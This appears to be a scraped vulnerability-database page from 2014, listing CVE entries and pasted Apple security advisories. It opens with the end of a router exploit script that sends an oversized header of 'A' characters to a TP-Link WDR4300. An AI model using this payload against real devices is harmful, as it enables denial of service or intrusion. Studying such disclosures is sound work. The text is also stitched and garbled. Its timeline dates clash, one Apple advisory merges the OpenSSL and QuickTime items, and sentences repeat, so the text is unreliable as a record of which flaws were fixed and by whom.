AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
conn.request("GET","/", "Let me tell you something", headers)
print "Done"
---- end wdr4300.py ----
Report Timeline:
===========
2014-07-04:
Vendor notified about the vulnerabilities with all the relevant technical information.
2013-09-16:
Vendor released a fix.
Credits:
======
The Vulnerabilities was discovered by Oz Elisyan.
References:
========
http://www.tp-link.com/lk/products/details/?model=TL-WDR4300
| VAR-201409-0394 | CVE-2014-3367 | VMware for Cisco Nexus 1000V InterCloud of vCloud Director Component cross-site scripting vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in the vCloud Director component in Cisco Nexus 1000V InterCloud for VMware allows remote attackers to inject arbitrary web script or HTML via an unspecified value, aka Bug ID CSCuq90524. Cisco Nexus 1000V InterCloud for VMware is a set of virtual switch software from Cisco Systems that provides Cisco Catalyst switches such as QoS, ACLs, and SPAN in a VMware virtualized environment. vCloud Director is one of the VMware virtual cloud infrastructure tools components. The program did not adequately filter the user-submitted input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue is being tracked by Cisco Bug ID CSCuq90524
| VAR-201409-1258 | No CVE | TRENDnet TEW-818DRU has an unknown vulnerability |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
TRENDnet TEW-818DRU is a routing device. There are unexplained vulnerabilities in TRENDnet TEW-818DRU and no detailed vulnerability details are available.
| VAR-201409-0395 | CVE-2014-3376 | Cisco IOS XR Service disruption in (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Cisco IOS XR 5.1 and earlier allows remote attackers to cause a denial of service (process reload) via a malformed RSVP packet, aka Bug ID CSCuq12031. Cisco IOS XR is a fully modular, distributed network operating system from Cisco's IOS software family.
This issue is being tracked by Cisco Bug ID CSCuq12031
| VAR-201409-0400 | CVE-2014-3377 | Cisco IOS XR of snmpd Service disruption in (DoS) Vulnerabilities |
CVSS V2: 4.0 CVSS V3: - Severity: MEDIUM |
snmpd in Cisco IOS XR 5.1 and earlier allows remote authenticated users to cause a denial of service (process reload) via a malformed SNMPv2 packet, aka Bug ID CSCun67791. Cisco IOS XR is a fully modular, distributed network operating system from Cisco's IOS software family.
This issue is being tracked by Cisco Bug ID CSCun67791
| VAR-201409-0401 | CVE-2014-3378 | Cisco IOS XR of tacacsd Denial of service in Japan (DoS) Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
tacacsd in Cisco IOS XR 5.1 and earlier allows remote attackers to cause a denial of service (process reload) via a malformed TACACS+ packet, aka Bug ID CSCum00468. Cisco IOS XR is a fully modular, distributed network operating system from Cisco's IOS software family.
Attackers can exploit this issue to cause the TACACS+ process on the affected device to reload, denying service to legitimate users.
This issue is being tracked by Cisco Bug ID CSCum00468
| VAR-201409-0402 | CVE-2014-3379 | Cisco IOS XR Denial of Service Vulnerability |
CVSS V2: 6.1 CVSS V3: - Severity: MEDIUM |
Cisco IOS XR 5.1 and earlier on Network Convergence System 6000 devices allows remote attackers to cause a denial of service (NPU and card hang or reload) via a malformed MPLS packet, aka Bug ID CSCuq10466. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches.
This issue is being tracked by Cisco Bug ID CSCuq10466
| VAR-201409-0722 | CVE-2014-5411 | Schneider Electric ClearSCADA Cross-Site Scripting Vulnerability |
CVSS V2: 3.5 CVSS V3: - Severity: MEDIUM |
Multiple cross-site scripting (XSS) vulnerabilities in Schneider Electric StruxureWare SCADA Expert ClearSCADA 2010 R3 through 2014 R1 allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. ClearSCADA is an integrated SCADA host platform that includes a rotation training engine, real-time database, web server, alarm processor and reporting software. A cross-site scripting vulnerability exists in the ClearSCADA WEB interface that allows an attacker to exploit a vulnerability to construct a malicious URI, to induce user resolution, and to perform system management operations. Scada Expert Clearscada is prone to a cross-site scripting vulnerability. Schneider Electric StruxureWare SCADA Expert ClearSCADA is a set of energy efficiency management software monitoring platform of French Schneider Electric (Schneider Electric). The platform is primarily used for remote management of critical infrastructure
| VAR-201409-0501 | CVE-2014-4406 | Apple OS X Server of CoreCollaboration of Xcode Server Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in Xcode Server in CoreCollaboration in Apple OS X Server before 3.2.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
This issue is fixed in Mac OS X Server version 3.2.1. The software enables file sharing, meeting scheduling, website hosting, network remote access, and more. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-10-16-3 OS X Server v4.0
OS X Server v4.0 is now available and addresses the following:
BIND
Available for: OS X Yosemite v10.10 or later
Impact: Multiple vulnerabilities in BIND, the most serious of which
may lead to a denial of service
Description: Multiple vulnerabilities existed in BIND. These issues
were addressed by updating BIND to version 9.9.2-P2
CVE-ID
CVE-2013-3919
CVE-2013-4854
CVE-2014-0591
CoreCollaboration
Available for: OS X Yosemite v10.10 or later
Impact: A remote attacker may be able to execute arbitrary SQL
queries
Description: A SQL injection issue existed in Wiki Server. This
issue was addressed through additional validation of SQL queries.
CVE-ID
CVE-2014-4424 : Sajjad Pourali (sajjad@securation.com) of CERT of
Ferdowsi University of Mashhad
CoreCollaboration
Available for: OS X Yosemite v10.10 or later
Impact: Visiting a maliciously crafted website may lead to a cross-
site scripting attack
Description: A cross-site scripting issue existed in Xcode Server.
This issue was addressed through improved encoding of HTML output.
CVE-ID
CVE-2014-4406 : David Hoyt of Hoyt LLC
CoreCollaboration
Available for: OS X Yosemite v10.10 or later
Impact: Multiple vulnerabilities in PostgreSQL, the most serious of
which may lead to arbitrary code execution
Description: Multiple vulnerabilities existed in PostgreSQL. These
issues were addressed by updating PostgreSQL to version 9.2.7.
CVE-ID
CVE-2014-0060
CVE-2014-0061
CVE-2014-0062
CVE-2014-0063
CVE-2014-0064
CVE-2014-0065
CVE-2014-0066
Mail Service
Available for: OS X Yosemite v10.10 or later
Impact: Group SACL changes for Mail may not be respected until after
a restart of the Mail service
Description: SACL settings for Mail were cached and changes to the
SACLs were not respected until after a restart of the Mail service.
This issue was addressed by resetting the cache upon changes to the
SACLs.
CVE-ID
CVE-2014-4446 : Craig Courtney
Profile Manager
Available for: OS X Yosemite v10.10 or later
Impact: Multiple vulnerabilities in LibYAML, the most serious of
which may lead to arbitrary code execution
Description: Multiple vulnerabilities existed in LibYAML. These
issues were addressed by switching from YAML to JSON as Profile
Manager's internal serialization format.
CVE-ID
CVE-2013-4164
CVE-2013-6393
Profile Manager
Available for: OS X Yosemite v10.10 or later
Impact: A local user may obtain passwords after setting up or
editing profiles in Profile Manager
Description: In certain circumstances, setting up or editing
profiles in Profile Manager may have logged passwords to a file. This
issue was addressed through improved handling of credentials.
CVE-ID
CVE-2014-4447 : Mayo Jordanov
Server
Available for: OS X Yosemite v10.10 or later
Impact: An attacker may be able to decrypt data protected by SSL
Description: There are known attacks on the confidentiality of SSL
3.0 when a cipher suite uses a block cipher in CBC mode. An attacker
could force the use of SSL 3.0, even when the server would support a
better TLS version, by blocking TLS 1.0 and higher connection
attempts. This issue was addressed by disabling SSL 3.0 support in
Web Server, Calendar & Contacts Server, and Remote Administration.
CVE-ID
CVE-2014-3566 : Bodo Moeller, Thai Duong, and Krzysztof Kotowicz of
Google Security Team
ServerRuby
Available for: OS X Yosemite v10.10 or later
Impact: Running a Ruby script that handles untrusted YAML tags may
lead to an unexpected application termination or arbitrary code
execution
Description: An integer overflow issue existed in LibYAML's handling
of YAML tags. This issue was addressed through additional validation
of YAML tags.
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJUQCLKAAoJEBcWfLTuOo7tqr0P/1fGVeD8xAAgMRpH/hYYkKpj
CGKAUBfTXM9clAhUHP1Es+T1qG67JX9CNrrl5yKMQCupojgNIkO1D0Pj5QlLZzkL
HR6AgI8eYeykiw8VRFI8DC7f3q/A1aRrijj8bPQ6BoPUq28Vya/GjEAMxV1l21l1
qLyNiDH8X8DC/CWyxOXVMD4yqIpzCOPEIAvgV1aB0z1UEdw7fLLBCEIAkNR3tL9M
5OlRT8X4dzpx3YpTvlB9s7zIAPtLgTjcVpPbkT2yJ9OZsewml2aFM7NWDYpYhIRg
z7bOMmKZep15a+XeXH7cdqXMfHW/XGdkYF/4Z85wHG44Kebaikq+K0XoTxjHlqXi
9rtNdcwh+p4DxTQNO0fK7WbfAo7FiF6aonY9D9hp47jbhB9KODVeOpqo6B7sOudq
tBAAS1pBbrsULUWRCZRaN3LlPigtInqIIPuLGVQx4ApUo1guxXb0A88ZU3yiR+Bl
RJHAEoevKjqhLiZDt1V8sSk6sPAh7p02deP5RDIwNJfapP+RrXoJ6knexRD44kNb
MwVD6a2EcOoRFgwcjvgFZ1etpoHT/VAs7Ql/GjWN5snDLsZ/vlGtSPn1i3kjkxBZ
oYDmJfC91RoC6exW7img3H9csN0sgtVGJRLrf6cdg41EjVjQaUUVQfBn/DVVyMb8
fIWnhQEvESJVqfrk3Q3X
=LbVb
-----END PGP SIGNATURE-----
| VAR-201412-0282 | CVE-2014-5208 | CENTUM and Exaopc Vulnerabilities that allow access to arbitrary files |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
BKBCopyD.exe in the Batch Management Packages in Yokogawa CENTUM CS 3000 through R3.09.50 and CENTUM VP through R4.03.00 and R5.x through R5.04.00, and Exaopc through R3.72.10, does not require authentication, which allows remote attackers to read arbitrary files via a RETR operation, write to arbitrary files via a STOR operation, or obtain sensitive database-location information via a PMODE operation, a different vulnerability than CVE-2014-0784. Provided by Yokogawa Electric Corporation CENTUM and Exaopc Is BKBCopyD.exe There is a problem in the processing of the file, and there is a vulnerability that can access arbitrary files. In addition, National Vulnerability Database (NVD) Then CWE-284 It is published as Supplementary information : CWE Vulnerability type by CWE-284: Improper Access Control ( Inappropriate access control ) Has been identified. http://cwe.mitre.org/data/definitions/284.htmlCrafted communication frame 20111/tcp By sending to, arbitrary files may be obtained or created with the user's authority. Yokogawa CENTUM CS3000 is a production control system.
If Yokogawa CENTUM's multiple products have Batch Management installed, they will start the BKBCopyD.exe service and listen on the 20111 / TCP port. There is no verification mechanism, allowing attackers to use the vulnerability to perform malicious operations, such as reading and writing files. Multiple Yokogawa products are prone to a security weakness.
An attacker may leverage this issue to obtain potentially sensitive information and perform unauthorized actions in the context of the affected application. Yokogawa CENTUM CS, etc. are all products of Japan's Yokogawa Electric (Yokogawa) company. Exaopc is an OPC data access server. The vulnerability is caused by the program not requiring authentication. The following products and versions are affected: Yokogawa CENTUM CS 3000 R3.09.50 and earlier, CENTUM VP R4.03.00 and earlier, R5.x R5.04.00 and earlier, Exaopc R3.72.10 and earlier
| VAR-201410-0363 | CVE-2014-7140 | Citrix NetScaler Application Delivery Controller and NetScaler Gateway Arbitrary code execution vulnerability in the management interface |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in the management interface in Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway 10.x before 10.1-129.11 and 10.5 before 10.5-50.10 allows remote attackers to execute arbitrary code via unknown vectors. Successful exploits will compromise the application and possibly the underlying device
| VAR-201409-0533 | CVE-2014-1391 | Apple OS X of QT Media Foundation Vulnerable to arbitrary code execution |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
QT Media Foundation in Apple OS X before 10.9.5 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted movie file with RLE encoding. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of RLE encoded data in the mdat atom. An attacker can use this flaw to write outside the allocated buffer, which could allow for the execution of arbitrary code in the context of the current process. Apple Mac OS X is prone to a memory-corruption vulnerability because it fails to perform adequate bounds checks on user-supplied input.
Successful exploits may allow attackers to execute arbitrary code in the context of the currently logged-in user; failed exploit attempts will cause denial-of-service conditions. Apple OS X is a dedicated operating system developed by Apple for Mac computers. A security vulnerability exists in QT Media Foundation versions prior to Apple OS X 10.9.5. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-09-17-3 OS X Mavericks 10.9.5 and Security Update
2014-004
OS X Mavericks 10.9.5 and Security Update 2014-004 are now available
and address the following:
apache_mod_php
Available for: OS X Mavericks 10.9 to 10.9.4
Impact: Multiple vulnerabilities in PHP 5.4.24
Description: Multiple vulnerabilities existed in PHP 5.4.24, the
most serious of which may have led to arbitrary code execution. This
update addresses the issues by updating PHP to version 5.4.30
CVE-ID
CVE-2013-7345
CVE-2014-0185
CVE-2014-0207
CVE-2014-0237
CVE-2014-0238
CVE-2014-1943
CVE-2014-2270
CVE-2014-3478
CVE-2014-3479
CVE-2014-3480
CVE-2014-3487
CVE-2014-3515
CVE-2014-3981
CVE-2014-4049
Bluetooth
Available for: OS X Mavericks 10.9 to 10.9.4
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A validation issue existed in the handling of a
Bluetooth API call. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2014-4390 : Ian Beer of Google Project Zero
CoreGraphics
Available for: OS X Mavericks 10.9 to 10.9.4
Impact: Opening a maliciously crafted PDF file may lead to an
unexpected application termination or an information disclosure
Description: An out of bounds memory read existed in the handling of
PDF files. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-4378 : Felipe Andres Manzano of Binamuse VRT working with
the iSIGHT Partners GVP Program
CoreGraphics
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 to 10.9.4
Impact: Opening a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: An integer overflow existed in the handling of PDF
files. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-4377 : Felipe Andres Manzano of Binamuse VRT working with
the iSIGHT Partners GVP Program
Foundation
Available for: OS X Mavericks 10.9 to 10.9.4
Impact: An application using NSXMLParser may be misused to disclose
information
Description: An XML External Entity issue existed in NSXMLParser's
handling of XML. This issue was addressed by not loading external
entities across origins.
CVE-ID
CVE-2014-4374 : George Gal of VSR (http://www.vsecurity.com/)
Intel Graphics Driver
Available for: OS X Mountain Lion v10.8.5,
OS X Mavericks 10.9 to 10.9.4
Impact: Compiling untrusted GLSL shaders may lead to an unexpected
application termination or arbitrary code execution
Description: A user-space buffer overflow existed in the shader
compiler. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-4393 : Apple
Intel Graphics Driver
Available for: OS X Mountain Lion v10.8.5,
OS X Mavericks 10.9 to 10.9.4
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: Multiple validation issues existed in some integrated
graphics driver routines. These issues were addressed through
improved bounds checking.
CVE-ID
CVE-2014-4394 : Ian Beer of Google Project Zero
CVE-2014-4395 : Ian Beer of Google Project Zero
CVE-2014-4396 : Ian Beer of Google Project Zero
CVE-2014-4397 : Ian Beer of Google Project Zero
CVE-2014-4398 : Ian Beer of Google Project Zero
CVE-2014-4399 : Ian Beer of Google Project Zero
CVE-2014-4400 : Ian Beer of Google Project Zero
CVE-2014-4401 : Ian Beer of Google Project Zero
CVE-2014-4416 : Ian Beer of Google Project Zero
IOAcceleratorFamily
Available for: OS X Mountain Lion v10.8.5,
OS X Mavericks 10.9 to 10.9.4
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A null pointer dereference existed in the handling of
IOKit API arguments. This issue was addressed through improved
validation of IOKit API arguments.
CVE-ID
CVE-2014-4376 : Ian Beer of Google Project Zero
IOAcceleratorFamily
Available for: OS X Mavericks 10.9 to 10.9.4
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: An out-of-bounds read issue existed in the handling of
an IOAcceleratorFamily function. This issue was addressed through
improved bounds checking.
CVE-ID
CVE-2014-4402 : Ian Beer of Google Project Zero
IOHIDFamily
Available for: OS X Mountain Lion v10.8.5,
OS X Mavericks 10.9 to 10.9.4
Impact: A local user can read kernel pointers, which can be used to
bypass kernel address space layout randomization
Description: An out-of-bounds read issue existed in the handling of
an IOHIDFamily function. This issue was addressed through improved
bounds checking.
CVE-ID
CVE-2014-4379 : Ian Beer of Google Project Zero
IOKit
Available for: OS X Mountain Lion v10.8.5,
OS X Mavericks 10.9 to 10.9.4
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A validation issue existed in the handling of certain
metadata fields of IODataQueue objects. This issue was addressed
through improved validation of metadata.
CVE-ID
CVE-2014-4388 : @PanguTeam
IOKit
Available for: OS X Mountain Lion v10.8.5,
OS X Mavericks 10.9 to 10.9.4
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: An integer overflow existed in the handling of IOKit
functions. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-4389 : Ian Beer of Google Project Zero
Kernel
Available for: OS X Mavericks 10.9 to 10.9.4
Impact: A local user can infer kernel addresses and bypass kernel
address space layout randomization
Description: In some cases, the CPU Global Descriptor Table was
allocated at a predictable address. This issue was addressed through
always allocating the Global Descriptor Table at random addresses.
CVE-ID
CVE-2014-4403 : Ian Beer of Google Project Zero
Libnotify
Available for: OS X Mountain Lion v10.8.5,
OS X Mavericks 10.9 to 10.9.4
Impact: A malicious application may be able to execute arbitrary
code with root privileges
Description: An out-of-bounds write issue existed in Libnotify. This
issue was addressed through improved bounds checking
CVE-ID
CVE-2014-4381 : Ian Beer of Google Project Zero
OpenSSL
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 to 10.9.4
Impact: Multiple vulnerabilities in OpenSSL 0.9.8y, including one
that may lead to arbitrary code execution
Description: Multiple vulnerabilities existed in OpenSSL 0.9.8y.
This update was addressed by updating OpenSSL to version 0.9.8za. This issue was addressed through improved
bounds checking.
CVE-ID
CVE-2014-1391 : Fernando Munoz working with iDefense VCP, Tom
Gallagher & Paul Bates working with HP's Zero Day Initiative
QT Media Foundation
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 to 10.9.4
Impact: Playing a maliciously crafted MIDI file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of MIDI
files. This issue was addressed through improved bounds checking. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2014-4979 : Andrea Micalizzi aka rgod working with HP's Zero Day
Initiative
ruby
Available for: OS X Mavericks 10.9 to 10.9.4
Impact: A remote attacker may be able to cause arbitrary code
execution
Description: A heap buffer overflow existed in LibYAML's handling of
percent-encoded characters in a URI. This issue was addressed through
improved bounds checking. This update addresses the issues by
updating LibYAML to version 0.1.6
CVE-ID
CVE-2014-2525
Note: OS X Mavericks 10.9.5 includes the security content of
Safari 7.0.6: http://support.apple.com/kb/HT6367
OS X Mavericks v10.9.5 and Security Update 2014-004 may be obtained
from the Mac App Store or Apple's Software Downloads web site:
http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJUGkP0AAoJEBcWfLTuOo7tygQP/1vHYXtWy6492Tjj6ycymWa+
Ct0eCCBU/AUi5ODNDeV9ddWkuFeXKbgQSHoPU19IPcIBAKnYUupVJSJ/cEHfSthh
CiROjJw8Bt8comn04BgggHieLveN1xQCXQDcO29kBIpQr394XKS0lNXP//Z0oG5V
sCnEDPz/0R92mwT5XkKD9WC7G/WjybS5V7BjEbdzDOn4qdTVje05xI5pof+fkeQ1
hFHo7uTCDkSzLH2YxrQHifNVyItz8AgnNHwH7zc6XmNtiNFkiFP/KU6BYyr8WiTQ
Jb3pyLB/Xvmbd0kuETnDNvV0oJc88G38a++xZPnuM7zQrW/TQkkKQpiqKtYAiJuw
ZhUoky620/7HULegcYtsTyuDFyEN6whdSmHLFCJzk2oZXZ7MPA8ywCFB8Y79rohW
5MTe/zVUSxxYBgVXpkmhPwXYSTINeUJGJA1RQtXhC2Hh6O2jeqJP2H0hTmgsCBRA
3X/2CGoyAAgoKTJwgXk07tBbJWf+wQwAvUN9L1Yph+uOvvUzqFt8LNEGw9jVPsZl
QHcSEW/Ef/HK/OLwVZiPqse6lRJAdRZl5//vm4408jnXfJCy6KnvxcsO4Z1yTyoP
kCXdWlSLBiidcRRWBfoQBSC3gANcx9a56ItWieEvJrdNOiyhb+gqEk7XraOlb/gf
k4w2RKNm0Fv+kdNoFAnd
=gpVc
-----END PGP SIGNATURE-----
| VAR-201409-0519 | CVE-2014-4383 | Apple iOS and Apple TV of Assets Vulnerability in device update status in subsystem |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
The Assets subsystem in Apple iOS before 8 and Apple TV before 7 allows man-in-the-middle attackers to spoof a device's update status via a crafted Last-Modified HTTP response header. Apple iOS and TV are prone to multiple security vulnerabilities. These issues affect the following components:
802.1X, Accounts, Accessibility, Accounts Framework, Address Book, App Installation, Assets, Bluetooth, CoreGraphics, Foundation, Home & Lock Screen, iMessage, IOAcceleratorFamily, IOAcceleratorFamily, IOHIDFamily, IOHIDFamily, IOKit, Kernel, Libnotify, Mail, Profiles, Safari, Sandbox Profiles, syslog and WebKit components.
Successfully exploiting these issues may allow attackers to crash the affected device, bypass security restrictions, obtain sensitive information, or execute arbitrary code. Other attacks are also possible.
This BID is being retired. The following individual records exist to better document the issues:
69913 Apple iOS and TV CVE-2014-4364 Spoofing Vulnerability
69917 Apple iOS CVE-2014-4423 Information Disclosure Vulnerability
69926 Apple iOS Lock Screen CVE-2014-4368 Security Bypass Vulnerability
69930 Apple iOS and TV CVE-2014-4357 Local Information Disclosure Security Vulnerability
69932 Apple iOS CVE-2014-4352 Local Information Disclosure Security Vulnerability
69936 Apple iOS CVE-2014-4386 Local Privilege Escalation Vulnerability
69940 Apple iOS CVE-2014-4384 Local Privilege Escalation Vulnerability
69941 Apple iOS and TV CVE-2014-4383 Security Bypass Vulnerability
69943 Apple iOS CVE-2014-4354 Unspecified Security Vulnerability
69903 Multiple Apple Products CVE-2014-4377 PDF Handling Integer Overflow Vulnerability
69915 Apple TV/Mac OS X/iOS CVE-2014-4378 Out of Bounds Read Memory Corruption Vulnerability
69905 Apple Mac OS X and iOS CVE-2014-4374 XML External Entity Information Disclosure Vulnerability
69921 Apple TV/Mac OS X/iOS CVE-2014-4379 Out of Bounds Read Memory Corruption Vulnerability
69929 Apple TV and iOS CVE-2014-4369 NULL Pointer Dereference Denial of Service Vulnerability
69934 Apple TV and iOS CVE-2014-4373 NULL Pointer Dereference Denial of Service Vulnerability
69938 Apple TV and iOS CVE-2014-4405 NULL Pointer Dereference Remote Code Execution Vulnerability
69942 Apple TV and iOS CVE-2014-4380 Out of Bounds Read Write Remote Code Execution Vulnerability
69947 Apple TV and iOS CVE-2014-4404 Heap Based Buffer Overflow Vulnerability
69949 Apple iOS CVE-2014-4361 Security Bypass Vulnerability
69951 Apple iOS CVE-2014-4353 Race Condition Local Information Disclosure Vulnerability
69912 Apple iOS and TV CVE-2014-4407 Information Disclosure Security Vulnerability
69919 Apple iOS and TV CVE-2014-4371 Unspecified Security Vulnerability
69924 Apple iOS and TV CVE-2014-4421 Unspecified Security Vulnerability
69927 Apple iOS and TV CVE-2014-4420 Unspecified Security Vulnerability
69928 Apple iOS and TV CVE-2014-4419 Unspecified Security Vulnerability
69939 Apple iOS and TV CVE-2014-4408 Out of Bounds Read Local Memory Corruption Vulnerability
69944 Apple iOS and TV CVE-2014-4375 Local Memory Corruption Vulnerability
69946 Apple iOS and TV CVE-2014-4418 Remote Code Execution Vulnerability
69948 Apple TV/Mac OS X/iOS CVE-2014-4388 Remote Code Execution Vulnerability
69950 Apple TV/Mac OS X/iOS CVE-2014-4389 Integer Buffer Overflow Vulnerability
69937 WebKit Private Browsing CVE-2014-4409 Security Bypass Vulnerability
69911 Apple iOS and TV CVE-2014-4422 Security Bypass Vulnerability
69931 Apple TV/Mac OS X/iOS CVE-2014-4381 Arbitrary Code Execution Vulnerability
69914 Apple iOS CVE-2014-4366 Information Disclosure Vulnerability
69945 Apple iOS CVE-2014-4367 Security Vulnerability
69920 Apple iOS CVE-2014-4362 Information Disclosure Vulnerability
69922 Apple iOS CVE-2014-4356 Local Information Disclosure Vulnerability
69923 Apple iOS and TV CVE-2014-4372 Local Security Bypass Vulnerability
69937 WebKit Private Browsing CVE-2014-4409 Security Bypass Vulnerability. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-09-17-2 Apple TV 7
Apple TV 7 is now available and addresses the following:
Apple TV
Available for: Apple TV 3rd generation and later
Impact: An attacker can obtain WiFi credentials
Description: An attacker could have impersonated a WiFi access
point, offered to authenticate with LEAP, broken the MS-CHAPv1 hash,
and used the derived credentials to authenticate to the intended
access point even if that access point supported stronger
authentication methods. This issue was addressed by removing support
for LEAP.
CVE-ID
CVE-2014-4364 : Pieter Robyns, Bram Bonne, Peter Quax, and Wim
Lamotte of Universiteit Hasselt
Apple TV
Available for: Apple TV 3rd generation and later
Impact: An attacker with access to an device may access sensitive
user information from logs
Description: Sensitive user information was logged. This issue was
addressed by logging less information.
CVE-ID
